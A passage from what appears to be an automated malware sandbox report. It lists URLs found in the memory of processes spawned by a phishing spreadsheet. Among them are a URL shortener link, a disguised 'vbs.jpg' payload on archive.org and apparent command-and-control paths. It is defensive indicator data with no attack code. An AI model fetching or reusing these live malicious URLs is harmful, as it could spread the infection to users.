            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/Friends/996a06198942.html
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/baishimolinai/
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/chaomeihuixiang/
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/dongyuefeng/1/
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/dongyuefeng/10/
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/dongyuefeng/2/
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/dongyuefeng/3/
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/dongyuefeng/4/
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/dongyuefeng/5/
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/dongyuefeng/6/
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/dongyuefeng/7/
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/dongyuefeng/8/
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/dongyuefeng/9/
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/gaoqiaoshengzi/
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/julisha/
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/longzeluola/
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/meizhuling/
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/sitemap.xml
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/template/news/lvse/skin/html/css/style.css
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/template/news/lvse/skin/html/images/img17.jpg
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/template/news/lvse/skin/html/images/qr1.jpg
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/template/news/lvse/skin/html/images/qr2.jpg
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/template/news/lvse/skin/html/images/symbol-18.png
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/template/news/lvse/skin/html/images/symbol-5.png
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/template/news/lvse/skin/html/images/symbol-7.png
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/template/news/lvse/skin/html/js/common.js
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/template/news/lvse/skin/html/js/list.js
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/template/news/lvse/skin/js/cmstop-common.js
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/template/news/lvse/skin/js/config.js
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/template/news/lvse/skin/js/helper/modernizr.js
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/template/news/lvse/skin/js/jquery.cookie.js
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/template/news/lvse/skin/js/jquery.js
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/uploads/images/1198420.jpg
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/uploads/images/3038130.jpg
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/uploads/images/3087620.jpg
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/uploads/images/3135390.jpg
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/uploads/images/3325160.jpg
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/uploads/images/3466970.jpg
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/uploads/images/4025030.jpg
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/uploads/images/4370870.jpg
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/uploads/images/4905490.jpg
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/uploads/images/5033160.jpg
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/uploads/images/5046830.jpg
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/uploads/images/5580300.jpg
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/uploads/images/5835120.jpg
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/uploads/images/595320.jpg
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/uploads/images/6014650.jpg
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/uploads/images/6496300.jpg
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/uploads/images/7364440.jpg
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/uploads/images/7726870.jpg
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/uploads/images/8015020.jpg
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/uploads/images/8550950.jpg
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/uploads/images/8693410.jpg
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/uploads/images/8904020.jpg
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/uploads/images/9053100.jpg
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/uploads/images/9803940.jpg
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/weeg/
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/wutengcaixiang/
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/xiaoxiyou/
            Source: powershell.exe, 0000000A.00000002.446671943.0000000004E37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
            Source: powershell.exe, 0000000A.00000002.446671943.0000000004E37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
            Source: wfbjvizcWo.exe, 0000000E.00000002.620971996.0000000001E6C000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.kcrkimya.xyz
            Source: wfbjvizcWo.exe, 0000000E.00000002.620971996.0000000001E6C000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.kcrkimya.xyz/jwh2/
            Source: find.exe, 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmp, sqlite3.dll.13.drString found in binary or memory: http://www.sqlite.org/copyright.html.
            Source: find.exe, 0000000D.00000003.509961579.0000000005E69000.00000004.00000020.00020000.00000000.sdmp, 2893AGJN.13.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: find.exe, 0000000D.00000003.509961579.0000000005E69000.00000004.00000020.00020000.00000000.sdmp, 2893AGJN.13.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: powershell.exe, 0000000A.00000002.445038073.0000000003649000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 0000000A.00000002.445038073.0000000003649000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 0000000A.00000002.445038073.0000000003649000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: find.exe, 0000000D.00000003.509961579.0000000005E69000.00000004.00000020.00020000.00000000.sdmp, 2893AGJN.13.drString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: find.exe, 0000000D.00000003.509961579.0000000005E69000.00000004.00000020.00020000.00000000.sdmp, 2893AGJN.13.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: find.exe, 0000000D.00000003.509961579.0000000005E69000.00000004.00000020.00020000.00000000.sdmp, 2893AGJN.13.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: find.exe, 0000000D.00000002.621202000.0000000002D06000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.00000000030E6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open
            Source: find.exe, 0000000D.00000002.621202000.0000000002D06000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.00000000030E6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://help.hover.com/home?source=expired
            Source: powershell.exe, 0000000A.00000002.444696114.000000000275A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia803104.us.archive.org
            Source: powershell.exe, 0000000A.00000002.444135080.0000000000645000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.444696114.0000000002621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg
            Source: powershell.exe, 00000008.00000002.450023886.0000000002561000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia803104.us.archive.org/27/items/vbs_20240LR
            Source: jiourl.com.url.3.drString found in binary or memory: https://jiourl.com/
            Source: GmwgTs.url.3.drString found in binary or memory: https://jiourl.com/GmwgTs
            Source: Mac Purchase Order PO102935.xlsString found in binary or memory: https://jiourl.com/GmwgTsT
            Source: ~DF9EF225C0E73309A0.TMP.0.dr, 5B430000.0.drString found in binary or memory: https://jiourl.com/GmwgTsyX
            Source: powershell.exe, 0000000A.00000002.445038073.0000000003649000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: find.exe, 0000000D.00000003.509961579.0000000005E69000.00000004.00000020.00020000.00000000.sdmp, 2893AGJN.13.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
            Source: find.exe, 0000000D.00000003.509961579.0000000005E69000.00000004.00000020.00020000.00000000.sdmp, 2893AGJN.13.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: powershell.exe, 0000000A.00000002.446671943.0000000004E37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
            Source: find.exe, 0000000D.00000002.621202000.0000000002D06000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.00000000030E6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://twitter.com/hover
            Source: 2893AGJN.13.drString found in binary or memory: https://www.google.com/favicon.ico
            Source: wfbjvizcWo.exe, 0000000E.00000002.621060824.00000000030E6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/?source=expired
            Source: find.exe, 0000000D.00000002.621202000.0000000002D06000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.00000000030E6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/about?source=expired
            Source: find.exe, 0000000D.00000002.621202000.0000000002D06000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.00000000030E6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/domain_pricing?source=expired
            Source: find.exe, 0000000D.00000002.621202000.0000000002D06000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.00000000030E6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/domains/results
            Source: find.exe, 0000000D.00000002.621202000.0000000002D06000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.00000000030E6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/email?source=expired
            Source: find.exe, 0000000D.00000002.621202000.0000000002D06000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.00000000030E6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/privacy?source=expired
            Source: find.exe, 0000000D.00000002.621202000.0000000002D06000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.00000000030E6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/renew/domain/gymuniversity.net?source=expired
            Source: find.exe, 0000000D.00000002.621202000.0000000002D06000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.00000000030E6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/renew?source=expired
            Source: find.exe, 0000000D.00000002.621202000.0000000002D06000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.00000000030E6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/tools?source=expired
            Source: find.exe, 0000000D.00000002.621202000.0000000002D06000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.00000000030E6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/tos?source=expired
            Source: find.exe, 0000000D.00000002.621202000.0000000002D06000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.00000000030E6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/transfer_in?source=expired
